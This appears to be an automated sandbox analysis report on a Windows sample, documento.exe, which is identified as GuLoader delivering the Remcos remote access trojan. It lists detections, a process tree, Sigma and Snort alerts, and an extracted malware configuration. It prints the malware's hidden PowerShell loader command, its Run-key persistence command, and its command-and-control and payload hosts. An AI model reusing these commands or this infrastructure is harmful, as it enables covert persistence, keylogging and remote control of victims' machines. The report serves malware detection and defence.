Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
documento.exe

Overview

General Information

Sample name:documento.exe
Analysis ID:1434785
MD5:518c32edf768d3be4f268071e0722a0f
SHA1:2f606e59b3900154094978a3c2dcc16a7addfd55
SHA256:e7092eb28dc769559d0d9db50ef39b664ae5ec4ba76ac580c11dfbfa1c426290
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Installs new ROOT certificates
Obfuscated command line found
Powershell drops PE file
Searches for Windows Mail specific files
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w7x64
  • documento.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\documento.exe" MD5: 518C32EDF768D3BE4F268071E0722A0F)
    • powershell.exe (PID: 1784 cmdline: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • cmd.exe (PID: 3188 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: AD7B9C14083B52BC532FBA5948342B98)
      • wab.exe (PID: 3336 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: EF162817C730DB9355F6C28F2445D206)
        • cmd.exe (PID: 3372 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)" MD5: AD7B9C14083B52BC532FBA5948342B98)
          • reg.exe (PID: 3416 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)" MD5: D69A9ABBB0D795F21995C2F48C1EB560)
  • powershell.exe (PID: 3672 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3788 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • cmd.exe (PID: 3880 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: AD7B9C14083B52BC532FBA5948342B98)
      • wab.exe (PID: 2208 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: EF162817C730DB9355F6C28F2445D206)
  • powershell.exe (PID: 3948 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal) MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 4076 cmdline: "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • cmd.exe (PID: 1836 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: AD7B9C14083B52BC532FBA5948342B98)
      • wab.exe (PID: 2028 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: EF162817C730DB9355F6C28F2445D206)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mqerms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000013.00000002.791285733.00000000085E1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000003.00000002.538410512.000000000839B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 3336JoeSecurity_RemcosYara detected Remcos RATJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", CommandLine: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\documento.exe", ParentImage: C:\Users\user\Desktop\documento.exe, ParentProcessId: 1308, ParentProcessName: documento.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", ProcessId: 1784, ProcessName: powershell.exe
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 3336, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", ProcessId: 3372, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Startup key
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3372, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", ProcessId: 3416, ProcessName: reg.exe
              Sigma detected: Potential Dosfuscation Activity
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 3188, ProcessName: cmd.exe
              Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 3336, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)", ProcessId: 3372, ProcessName: cmd.exe
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 3336, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", CommandLine: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\documento.exe", ParentImage: C:\Users\user\Desktop\documento.exe, ParentProcessId: 1308, ParentProcessName: documento.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)", ProcessId: 1784, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1784, TargetFilename: C:\Users\user\AppData\Local\Temp\xpryghvs.t4f.ps1

              Snort Signatures

              Timestamp:05/01/24-18:23:23.262842
              SID:2032776
              Source Port:49209
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:20:57.936276
              SID:2032776
              Source Port:49168
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:21.331517
              SID:2032776
              Source Port:49178
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:23:13.842964
              SID:2032776
              Source Port:49208
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:43.786919
              SID:2032776
              Source Port:49194
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:20:44.045773
              SID:2032776
              Source Port:49162
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:22:00.766012
              SID:2032776
              Source Port:49201
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:07.237994
              SID:2032776
              Source Port:49172
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:27.525704
              SID:2032776
              Source Port:49182
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:30.630074
              SID:2032776
              Source Port:49184
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:20:47.790429
              SID:2032776
              Source Port:49164
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:41.022094
              SID:2032776
              Source Port:49192
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:22:17.546146
              SID:2032776
              Source Port:49203
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:02.210994
              SID:2032776
              Source Port:49170
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:13.917858
              SID:2032776
              Source Port:49174
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:52.776472
              SID:2032776
              Source Port:49200
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:46.503399
              SID:2032776
              Source Port:49196
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:20:51.253286
              SID:2032776
              Source Port:49166
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:38.544111
              SID:2032776
              Source Port:49190
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:16.542075
              SID:2032776
              Source Port:49176
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:23.863096
              SID:2032776
              Source Port:49180
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:32.998808
              SID:2032776
              Source Port:49186
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:35.642740
              SID:2032776
              Source Port:49188
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/01/24-18:21:49.211552
              SID:2032776
              Source Port:49198
              Destination Port:29871
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: learfo55ozj01.duckdns.orgAvira URL Cloud: Label: malware
              Source: https://ricohltd.top/Avira URL Cloud: Label: malware
              Source: https://ricohltd.top/ELFpBDmh152.binAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj01.duckdns.org:29871:0learfo55ozj01.duckdns.org:29872:1learfo55ozj02.duckdns.org:29872:1", "Assigned name": "Top", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "alpwovnb-G3F5OR", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mqerms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for domain / URL
              Source: learfo55ozj01.duckdns.orgVirustotal: Detection: 16%Perma Link
              Source: ricohltd.topVirustotal: Detection: 20%Perma Link
              Source: learfo55ozj01.duckdns.orgVirustotal: Detection: 16%Perma Link
              Source: https://ricohltd.top/Virustotal: Detection: 20%Perma Link
              Source: https://ricohltd.top/ELFpBDmh152.binVirustotal: Detection: 20%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exeReversingLabs: Detection: 45%
              Source: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare\documento.exeVirustotal: Detection: 29%Perma Link
              Multi AV Scanner detection for submitted file
              Source: documento.exeReversingLabs: Detection: 45%
              Source: documento.exeVirustotal: Detection: 29%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3336, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
              Source: documento.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.191.112:443 -> 192.168.2.22:49204 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.22:49205 version: TLS 1.2
              Source: documento.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: :\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.538026675.0000000005060000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
              Source: C:\Users\user\Desktop\documento.exeCode function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49162 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49164 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49166 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49168 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49170 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49172 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49174 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49176 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49178 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49180 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49182 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49184 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49186 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49188 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49190 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49192 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49194 -> 192.169.69.26:29871
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.22:49196 -> 192.169.69.26:29871
